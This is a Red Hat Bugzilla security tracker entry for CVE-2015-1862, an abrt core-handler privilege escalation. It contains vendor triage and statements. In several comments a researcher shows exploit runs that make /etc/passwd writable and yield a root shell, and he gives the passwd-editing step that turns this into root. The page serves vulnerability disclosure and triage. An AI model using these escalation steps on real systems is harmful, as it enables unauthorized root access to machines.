Bug 1211223 - (CVE-2015-1862) CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern
CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern
Status: CLOSED NOTABUG
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
high Severity high
: ---
: ---
Assigned To: Red Hat Product Security
impact=important,public=20150414,repo...
: Security
Depends On:
Blocks: 1211224 1214172
  Show dependency treegraph
 
Reported: 2015-04-13 06:58 EDT by Vasyl Kaigorodov
Modified: 2015-07-09 01:38 EDT (History)
14 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
A flaw was found in the way certain ABRT core handlers processed crash reports in a namespaced environment. A local, unprivileged user could use this flaw to escalate their privileges on the system.
Story Points: ---
Clone Of:
Environment:
Last Closed: 2015-07-09 01:38:34 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Vasyl Kaigorodov 2015-04-13 06:58:26 EDT
A local privilege escalation flaw was found in abrt, in the way certain core-handlers were specified by the abrt application. 

Specifically this issue affects those abrt versions in which the following core-handler was used:
HOOK_BIN="/usr/sbin/chroot /proc/%P/root @libexecdir@/abrt-hook-ccpp"

This commit was added to abrt via: (To add support for handling crashes inside containers)
https://github.com/abrt/abrt/commit/4ab9fbe1a6b7889a0cd59b1406e8789d52171fd2
https://github.com/abrt/abrt/issues/809

But later removed via:
https://github.com/abrt/abrt/commit/cdb507ed336fa30151eefa6510d20c9271e7fc82

No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code.

Support for containers was re-added in abrt (using a different method this time) via:
https://github.com/abrt/abrt/commit/a6cdfd6a16251447264d203e145624a96fa811e3
Comment 2 Francisco Alonso 2015-04-14 09:48:45 EDT
Public via:

http://www.openwall.com/lists/oss-security/2015/04/14/4
Comment 3 Tavis Ormandy 2015-04-14 15:10:49 EDT
It's not obvious to me that abrt in RHEL7 is not affected, are you sure?

I installed a default RHEL 7.1 Workstation in a VM, ran the exploit and it worked.


[taviso@localhost ~]$ gcc raceabrt.c -o /tmp/raceabrt                                  [taviso@localhost ~]$ /tmp/raceabrt /etc/passwd
Detected ccpp-2015-04-14-20:09:32-15116.new, attempting to race...
	Didn't win, trying again!
[snip lots of output]
	Didn't win, trying again!
Detected ccpp-2015-04-14-20:09:44-15493.new, attempting to race...
	Didn't win, trying again!
Detected ccpp-2015-04-14-20:09:44-15499.new, attempting to race...
	Exploit successful...
-rw-r--r--. 1 taviso abrt 2066 Apr 14 13:02 /etc/passwd
[taviso@localhost ~]$ cat /etc/redhat-release 
Red Hat Enterprise Linux Workstation release 7.1 (Maipo)
Comment 4 Tavis Ormandy 2015-04-14 15:14:29 EDT
In case it isn't obvious, you can easily turn this into a root shell like this:



 $ getent passwd taviso
 taviso:x:1000:1000:Tavis Ormandy:/home/taviso:/bin/bash
 $ vi /etc/passwd
 $ getent passwd taviso
 taviso:x:0:0:Tavis Ormandy:/home/taviso:/bin/bash
 $ su taviso
 Password:
 # id
 uid=0(root) gid=0(root) groups=0(root)
 exit
Comment 6 Florian Weimer 2015-04-14 16:13:10 EDT
The issue raised in comment #3 and comment #4 is a different vulnerability, not CVE-2015-1862.  It is currently under investigation.
Comment 7 Huzaifa S. Sidhpurwala 2015-04-15 01:25:03 EDT
Further clarification on previous comments:

Various flaws were discovered with abrt in Red Hat Enterprise Linux and Fedora. These were initially discussed on the closed vendors list called linux-distros, before being made public.

Initially a flaw related to namespaces/chroot support in abrt was discussed and was assigned CVE-2015-1862. This bug related to that particular CVE/flaw.

As mentioned above, since namespaces/chroot support in abrt does not exists in Red Hat Enterprise Linux and Fedora, these products are not affected by CVE-2015-1862.

Later, various other flaws were discussed on the list; these flaws were not assigned CVEs and it was suggested to discuss them via the open list, oss-security. These various other flaws are tracked via the following bug:

https://bugzilla.redhat.com/show_bug.cgi?id=1211835
http://www.openwall.com/lists/oss-security/2015/04/14/4

These additional flaws (tracked via bug 1211835) have been rated as having Important impact for Red Hat Enterprise Linux 7 as they can lead to privilege escalation to root (from a non-root local user), and Moderate impact for Red Hat Enterprise Linux 6, since they can lead to privilege escalation to root only from the abrt user.
Comment 9 Vincent Danen 2015-04-15 10:02:30 EDT
Statement:

Not vulnerable. This issue does not affect the version of abrt package as shipped with Red Hat Enterprise Linux 6 and 7. Additional information about this is available at https://bugzilla.redhat.com/show_bug.cgi?id=1211223#c7
Comment 10 Tavis Ormandy 2015-04-17 17:02:20 EDT
Thanks for the clarification, however I'm also confused about the statement "No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code", isn't Fedora 20 still supported?

$ rpm -qf /usr/libexec/abrt-hook-ccpp
abrt-addon-ccpp-2.2.2-1.fc20.x86_64
$ cat /etc/fedora-release 
Fedora release 20 (Heisenbug)
$ sysctl kernel.core_pattern
kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e

And the exploit works:

$ gcc newpid.c -o test -static
newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
 # warning this file must be compiled with -static
   ^
$ ./test 
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),18(dialout),987(wireshark),1000(taviso) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2#
Comment 11 Huzaifa S. Sidhpurwala 2015-07-09 01:38:34 EDT
Please note: Fedora 20 is now EOL and will not be patched for any flaws.
Closing this flaw.

Note You need to log in before you can comment on or make changes to this bug.